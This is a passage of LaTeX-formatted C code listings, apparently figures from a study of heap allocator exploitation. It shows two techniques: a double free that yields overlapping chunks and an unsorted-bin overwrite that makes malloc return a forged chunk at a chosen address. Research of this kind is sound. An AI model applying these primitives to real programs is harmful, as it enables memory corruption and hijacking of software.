  \PY{n}{assert}\PY{p}{(}\PY{n}{p} \PY{o}{=}\PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{)}\PY{p}{;}
\end{Verbatim}


==> code/unaligned-double-free.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// [PRE\PYZhy{}CONDITION]}
  \PY{c+c1}{//    sz1: non\PYZhy{}fast\PYZhy{}bin size}
  \PY{c+c1}{//    sz2: non\PYZhy{}fast\PYZhy{}bin size}
  \PY{c+c1}{//    sz1 and sz2 have the following relationship;}
  \PY{c+c1}{//    assert(chunk\PYZus{}size(sz1) * a == chunk\PYZus{}size(sz2) * b);}
  \PY{c+c1}{// [BUG] double free}
  \PY{c+c1}{// [POST\PYZhy{}CONDITION]}
  \PY{c+c1}{//    two chunks overlap}

  \PY{k}{for} \PY{p}{(}\PY{k+kt}{int} \PY{n}{i} \PY{o}{=} \PY{l+m+mi}{0}\PY{p}{;} \PY{n}{i} \PY{o}{\PYZlt{}} \PY{n}{a}\PY{p}{;} \PY{n}{i}\PY{o}{+}\PY{o}{+}\PY{p}{)}
    \PY{n}{p1}\PY{p}{[}\PY{n}{i}\PY{p}{]} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz1}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// allocate a chunk to prevent merging with the top chunk}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{l+m+mi}{0}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// free from backward not to modify size of p1[a \PYZhy{} 1]}
  \PY{k}{for} \PY{p}{(}\PY{k+kt}{int} \PY{n}{i} \PY{o}{=} \PY{n}{a} \PY{o}{\PYZhy{}} \PY{l+m+mi}{1}\PY{p}{;} \PY{n}{i} \PY{o}{\PYZgt{}}\PY{o}{=} \PY{l+m+mi}{0}\PY{p}{;} \PY{n}{i}\PY{o}{\PYZhy{}}\PY{o}{\PYZhy{}}\PY{p}{)}
    \PY{n}{free}\PY{p}{(}\PY{n}{p1}\PY{p}{[}\PY{n}{i}\PY{p}{]}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// allocate chunks to fill empty space}
  \PY{k}{for} \PY{p}{(}\PY{k+kt}{int} \PY{n}{i} \PY{o}{=} \PY{l+m+mi}{0}\PY{p}{;} \PY{n}{i} \PY{o}{\PYZlt{}} \PY{n}{b}\PY{p}{;} \PY{n}{i}\PY{o}{+}\PY{o}{+}\PY{p}{)}
    \PY{n}{p2}\PY{p}{[}\PY{n}{i}\PY{p}{]} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz2}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// now a next free chunk of p1[a\PYZhy{}1] is p whose P=1,}
  \PY{c+c1}{// and p1[a\PYZhy{}1] contains valid metadata}
  \PY{c+c1}{// since malloc does not clean up the memory}

  \PY{c+c1}{// [BUG] double free}
  \PY{n}{free}\PY{p}{(}\PY{n}{p1}\PY{p}{[}\PY{n}{a}\PY{o}{\PYZhy{}}\PY{l+m+mi}{1}\PY{p}{]}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// now new allocation returns p1[a\PYZhy{}1]}
  \PY{c+c1}{// that overlaps with p2[b\PYZhy{}1]}
  \PY{n}{assert}\PY{p}{(}\PY{n}{malloc}\PY{p}{(}\PY{n}{sz1}\PY{p}{)} \PY{o}{=}\PY{o}{=} \PY{n}{p1}\PY{p}{[}\PY{n}{a}\PY{o}{\PYZhy{}}\PY{l+m+mi}{1}\PY{p}{]}\PY{p}{)}\PY{p}{;}
\end{Verbatim}


==> code/unsorted-bin-into-stack.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// [PRE\PYZhy{}CONDITION]}
  \PY{c+c1}{//    sz : any non\PYZhy{}fast\PYZhy{}bin size}
  \PY{c+c1}{// [BUG] buffer overflow}
  \PY{c+c1}{// [POST\PYZhy{}CONDITION]}
  \PY{c+c1}{//    malloc(sz) = dst + offsetof(struct malloc\PYZus{}chunk, fd)}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p1} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p2} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p3} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// move p2 to the unsorted bin}
  \PY{n}{free}\PY{p}{(}\PY{n}{p2}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// create a fake chunk at dst}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{o}{*}\PY{n}{fake} \PY{o}{=} \PY{n}{dst}\PY{p}{;}
  \PY{c+c1}{// set fake\PYZhy{}\PYZgt{}size to be the chunk size of the last allocation}
  \PY{n}{fake}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{=} \PY{n}{chunk\PYZus{}size}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// set fake\PYZhy{}\PYZgt{}bk to any writable address to avoid a crash}
  \PY{n}{fake}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{bk} \PY{o}{=} \PY{n}{fake}\PY{p}{;}

  \PY{c+c1}{// [BUG] overflowing p1}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{o}{*}\PY{n}{c2} \PY{o}{=} \PY{n}{raw\PYZus{}to\PYZus{}chunk}\PY{p}{(}\PY{n}{p2}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// size should be smaller than the next allocation size}
  \PY{c+c1}{// to avoid returning c2 in the next allocation}
  \PY{c+c1}{// size shouldn\PYZsq{}t be too small due to a security check}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{=} \PY{l+m+mi}{2} \PY{o}{*} \PY{k}{sizeof}\PY{p}{(}\PY{k+kt}{size\PYZus{}t}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// set the next pointer in the unsorted bin}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{bk} \PY{o}{=} \PY{n}{fake}\PY{p}{;}

  \PY{c+c1}{// now unsorted bin: c2 \PYZhy{}\PYZgt{} fake,}
  \PY{c+c1}{// and c2 is too small for the request.}
  \PY{c+c1}{// therefore, next allocation returns the fake chunk}
  \PY{n}{assert}\PY{p}{(}\PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)} \PY{o}{=}\PY{o}{=} \PY{n}{fake} \PY{o}{+} \PY{n}{offsetof}\PY{p}{(}\PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{p}{,} \PY{n}{fd}\PY{p}{)}\PY{p}{)}\PY{p}{;}
\end{Verbatim}

